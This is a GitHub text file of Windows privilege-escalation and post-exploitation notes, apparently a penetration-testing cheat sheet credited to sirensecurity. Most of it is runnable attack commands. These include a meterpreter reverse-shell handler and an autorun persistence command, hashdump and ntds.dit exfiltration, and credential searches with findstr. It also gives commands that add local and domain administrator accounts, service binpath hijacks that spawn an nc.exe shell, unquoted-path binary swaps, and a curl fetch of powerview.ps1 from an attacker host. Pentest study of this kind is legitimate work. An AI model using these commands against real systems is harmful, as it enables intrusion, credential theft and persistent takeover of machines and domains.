-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwindows-privesc.txt
462 lines (343 loc) · 14.7 KB
/
windows-privesc.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
# credit: the amazing sirensecurity
# (with some reformatting and organization)
# https://sirensecurity.io/blog/windows-privilege-escalation-resources/
--------------------------------------------
TL;DR
--------------------------------------------
+ WHOAMI?
whoami
+ CAN I DO SPECIAL THINGS?
whoami /priv
+ SERVICES --> SERVICES AT BOOT & SERVICES RAN THROUGH ICACLS.EXE
wmic service get name,startname
net start
+ NETWORK CAPABILITIES? (CHECKS FOR 127)
+ SHELL CAPABILITY --> STAGED/NON-STAGED? FORMAT? ARCH? ENCODER? BIND/REVERSE?
+ SHELL CAPABILITY --> ENSURE CODE EXEC.
+ NETWORK CAPABILITY.
netstat -anoy
+ NET USERS (LATERAL MOVEMENT CAPABILITIES?)
net users
net localgroup
net user <username> (am i admin? any special groups?)
+ ADMIN CAPABILITY?
net localgroup administrators
+ PERMITTED TRAFFIC CAPABILITY???
netsh advfirewall firewall show rule name=all
netsh advfirewall firewall show rule name=inbound
netsh advfirewall firewall show rule name=outbounD
+ FILE TRANSFER CAPABILITY???
- certutil?
- FTP?
- TFTP?
- VB?
- PS?
- SMB?
- NFS?
+ ANY SCHEDULED TASKS I/O OPERATIONS?
C:\ > schtasks /query /fo LIST /v > schtasks.txt
+ BINPATHS?
sc.exe
+ Pro-tip - To prevent your shell from hanging as a result of any of these commands, prefix them with this!
cmd.exe /c <commands>
cmd.exe /c start <commands>
+ Pro-tip - Windows Powershell Execution Policy Bypass:
PowerShell.exe -ExecutionPolicy UnRestricted -File .shell.ps1
+ I just got shell on windows! What would S1REN do?
--> Get a meterpreter shell.
When it comes to a windows machine and receiving a low privilege shell - I do not mess around. I will always immediately work to maintain access and gain a more useful shell with meterpreter.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacking Machine IP>
set LPORT <Listening Port>
--- Persistence with Meterpreter
+ Maintaining Access with Meterpreter:
https://www.offensive-security.com/metasploit-unleashed/maintaining-access/
meterpreter> run persistence -U -i 5 -p 443 -r <Attacking Machine IP>
[*] Creating a persistent agent: LHOST=<Attacking Machine IP> LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter>
meterpreter> reboot
Rebooting...
meterpreter> exit
meterpreter> sysinfo
Computer: XEN-XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter>
+ Forward out a vulnerable service with meterpreter.
meterpreter> portfwd add -l <Attacker PORT> -p <Victim PORT> -r <Victim IP>
meterpreter> portfwd add -l 3306 -p 3306 -r <Victim IP>
$ rdesktop 0.0.0.0
+ Dude just do this with your meterpreter shell - trust S1REN.
use exploit/windows/local/service_permissions
+ Migrate to a stable process.
--> "Using the migrate post module, you can migrate to another process on the victim."
meterpreter> run post/windows/manage/migrate
meterpreter> migrate -h
meterpreter> migrate <PID>
--- Payloads
- Checkbox target machine's file arch (x86, x64).
- Checkbox target machine for staged OR non-staged payloads..
+ Execute a Powershell Script.
powershell.exe 'C:\Tools\privesc.ps1'
--------------------------------------------
Basic enumeration checklist
--------------------------------------------
+ System Information
Save this info - it can be utilized with other windows privesc checking tools (based on installed patches, OS Versioning, etc)
systeminfo
+ Who am I?
whoami
echo %username%
+ Privileges
whoami /priv
+ List out all NT AUTHORITY/SYSTEM Services.
wmic service get name,startname |FINDSTR "NT"
+ Print Nightmare?
whoami /priv
SetImpersonatePrivilege Enabled? 🙂
--- ActiveDirectory?
+ Domain Box?
Bloodhound? Sharphound?
+ Can we Install Things Elevated?
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
[Installing Elevated]
msiexec /i <path to msi file>
+ Will the path to privilege escalation lie in a executable binary or service in Program Files? Is it listening on local only and thus we missed it from the outside scans?
cd "C:\Program Files"
dir /a /o /q
cd "C:\Program Files (x86)"
dir /a /o /q
--- Users enumerations
+ What is my current user's privileges?
net user someWindowsUser
+ What are other user's privileges?
net users
+ Who's the Administrator(s) around here?
net localgroup administrators
+ Might we be able to move laterally to them if they are Administrators?
net user somePotentialAdminUser
--- Hash Collection:
pg_dump.exe
meterpreter > hashdump
ntds.dit exfiltration.
--- Firewall enumeration
+ Firewall Information?
netsh firewall show state
netsh firewall show config
--- Network Information
+ (who am I connected to? can anything off of Loopback be forwarded out to 0.0.0.0?)
netstat -anoy
route print
arp -A
ipconfig /all
--- Looting credentials
+ Cleartext Passwords in Files? Search for them.
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
+ Find all those password and credential strings in config files.
dir /s pass == cred == vnc == .config
+ Find all passwords in all files...
findstr /spin "password" .
--- Windows shares.
net share
net use
--> create a share on windows from the command line:
net share <SHARENAME>=<DRIVE/FOLDERPATH> /REMARK: "tHIS IS MY SHARE."
--> MOUNT A WINDOWS SHARE FROM THE COMMAND LINE:
net use Z:\\computer_name\share_name /persistent:yes
--> UNMOUNT SHARE:
net use z: /delete
--> DELETE A SHARE ENTIRLEY:
net share /delete
--- Finding weak file permissions
+ Find ALL weak file permissions per drive.
accesschk.exe -uwqs Users c:*.*
+ A part of group "Authenticated Users" - you would be surprised if you have a real user.
accesschk.exe -uwqs "Authenticated Users" c:*.*
--- Adding Admin users / Domain admins
+ Add an Administrator User with all of the goodies.
cmd.exe /c net user siren superPassword /add
cmd.exe /c net localgroup administrators siren /add
cmd.exe /c net localgroup "Remote Desktop Users" siren /add
+ Adding a Windows Domain Administrator from the Command Line:
cmd.exe /c net user siren superPassword /add
net localgroup Administrators siren /ADD /DOMAIN
net localgroup "Remote Desktop Users" siren /ADD /DOMAIN
net group "Domain Admins" siren /ADD /DOMAIN
net group "Enterprise Admins" siren /ADD /DOMAIN
net group "Schema Admins" siren /ADD /DOMAIN
net group "Group Policy Creator Owners" siren /ADD /DOMAIN
--- Scheduled Tasks
+ Time and our own Scheduled Tasks.
time
The current time is: 6:41:05.81
at 06:42 /interactive "C:\Tools\sirenMaint.exe"
+ Create a Task. Run as System. Every 5 minutes. Path to binary.
schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn RUNME /tr "\"C:\Tools\sirenMaint.exe\""
Attacking Machine:
nc -lvp 443
Victim Machine:
schtasks /RUN /TN "RUNME"
+ Fun with Accesschk Enumeration!
accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv [service_name]
--- Folder permissions
+ Find ALL weak folder permissions, per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs Users c:*.*
accesschk.exe -uwqs "Authenticated Users" c:*.*
--- Escalate from NT AUTHORITY\ NETWORK SERVICE
+ Let me guess, you came in as NT AUTHORITY\NETWORK SERVICE ?
MS09-012.exe "whoami"
Initiate Network-Related Transfer Again.
MS09-012.exe "ftp -v -n -s:ftp.txt" and come back in NT Shell.
--- Weak service path discovered?
+ I enumerated a weak service path on the machine. How do I exploit this... S1REN?
sc config UPNPHOST binpath= "C:\Tools\sirenMaint.exe"
sc config UPNPHOST obj= ".\LocalSystem" password= ""
sc config SSDPSRV binpath= "C:\inetpub\siren\sirenMaint.exe"
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= "demand"
(Now, Stage matching msfvenom Payload Listener in Meterpreter)
net stop SSDPSRV
net start SSDPSRV
+ Up to Vista...
psexec -i -s cmd.exe
+ On Windows XP and Older we can get an Administrator Privilege shell.
--> IF you have a GUI with a USER THAT IS INCLUDED IN THE Administrators GROUP you first
need to open up cmd.exe for the administrator. If you open up the cmd that is in
Accessories it will be opened up as a normal user. And if you rightclick and do
Run as Administrator you might need to know the Administrators password. Which
you might not know. So instead you open up the cmd from C:\windows\system32\cmd.exe.
This will give you a cmd with Administrators Rights.
--> From here, we want SYSTEM level privileges, no?
--> First we check what time it is on the local machine.
time
--> Now we set the time we want the system CMD to start.
--> Probably one minuter after the time.
at 01:23 /interactive cmd.exe
System Shell.
--- Unquoted Service paths
+ Ahh, so you're interested in UNQUOTED SERVICE PATHS... eh?
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\" |findstr /i /v """
--> Using SC:
sc query
sc qc <service name>
--> Okay S1REN, what am I looking for here?
If the results of the above command's value of path only contains "" and spaces - it's vulnerable.
--> Have a hit?
--> Use icacls or cacls.exe (both native to Windows) to check binary permissions.
icacls "C:\Program Files (x86)\UNQUOTED_SERVICE_PATH_SOFTWARE"
--> Exploit it.
--> If the path of the Binary file is:
C:\Program Files\something\something.exe
--> Then,
move something.exe something.exe.BACK
move sirenMaint.exe C:\Program Files\something\
move sirenMaint.exe something.exe
--> Well, wasn't that fun? Now our payload will get executed instead of the intended exe!
--> Nice.
#S1REN, is there a better way to enumerate out every service and then just check for which of them has an Unquoted Bin Paths?
--> Yup.
--> Thanks S1REN!
cd "C:\Windows\TEMP"
sc query state= all | findstr "SERVICE_NAME:" >> ServiceNames.txt
FOR /F %i in (ServiceNames.txt) DO echo %i
type ServiceNames.txt
FOR /F "tokens=2 delims= " %i in (ServiceNames.txt) DO @echo %i >> Services.txt
FOR /F %i in (Services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
type path.txt
Nice.
--> S1REN.
--> Yes?
--> Is there a way to do essentially the same thing and then recursively execute icacls.exe or cacls.exe on them to get the information I need?
--> Yup.
cd "C:\Windows\TEMP\"
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> C:\windows\temp\permissions.txt
###
icacls.exe:
for /f eol^=^"^ delims^=^" %a in (C:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
cacls.exe
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c cacls "%a"
IF YOU FIND A SERVICE THAT HAS WRITE PERMISSIONS set to "EVERYONE", you can change
that binary INTO YOUR OWN CUSTOM BINARY and make it execute in the privileged context.
--- Scheduled tasks with SYSTEM privileges
+ Dealing with Scheduled Tasks with SYSTEM Privileges.
--> Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
schtasks /query /fo LIST /v > schtask.txt
type schtask.txt
(Copy that output to a temporary file)
--> Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user. In other words, copy the output into Kali and just grep for SYSTEM.
--> Nice, S1REN.
--> Thanks.
cat schtask.txt | grep "SYSTEM|Task To Run" | grep -B 1 SYSTEM --color=auto
--> Now, Change up the UPNP Service Binary Path (for example):
sc config upnphost binpath= "C:\Tools\nc.exe -nlvp 6666 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
net stop <service>
--> Attacking Machine
nc -nlvp 6666
net start <service>
--- Tools
(Remember how I said to save a local copy of that systeminfo output?)
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
--- Cross-Compilation
+ How do I cross-compile payloads for Windows on Linux, S1REN?
--> Dude, check this out.
apt-get install mingw-w64
Cross-compilation Reference:
- Ci686-w64-mingw32-gcc hello.c -o hello32.exe
- 32-bitx86_64-w64-mingw32-gcc hello.c -o hello64.exe
- 64-bit # C++i686-w64-mingw32-g++ hello.cc -o hello32.exe
- 32-bitx86_64-w64-mingw32-g++ hello.cc -o hello64.exe # 64-bit
--------------
More notes, other sources ; emf
Windows pentest list:
- Got user? -> Evil-WinRm (Gets you remote session as user)
Windows post-exploitation checklist
1. Enumerate user
whoami
2. Enumerate user privileges
whoami /priv
netuser [username]
3. List running processes
tasklist
Increasing foothold
- Download powerview.ps1
(serve with simplehttp)
curl $attackerIp:$port/powerview.ps1 ./powerview.ps1
- Group policy vertical privesc
-> Try to get group policy for vertical escalation, see what your user can do
-> Get default ID of default domain policy
Get-GPO "Default Domain Policy"
-> See what your user could do with this policy permission
Get-GPPermission -Guid [policyId] -TargetType User -TargetName [yourUser]
-> (Look for Permission section: Can you Edit/Modify?)
-> Add the policy to your user
---
Tools
- EvilWinRM Windows remote shell / management tool
- SharpGPOAbuse Abuse user edit rights on an AD group policy object to compromise objects it is attached to
- psexec.py Multipurpose tool, used for lateral movement in Windows network.
Can run commands as other users using hashes, get IP configurations of remote systems,
--- Resources
- https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
- https://www.fuzzysecurity.com/tutorials/16.html
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
+ Domains.xml Abuse.
https://github.com/FSecureLABS/SharpGPOAbuse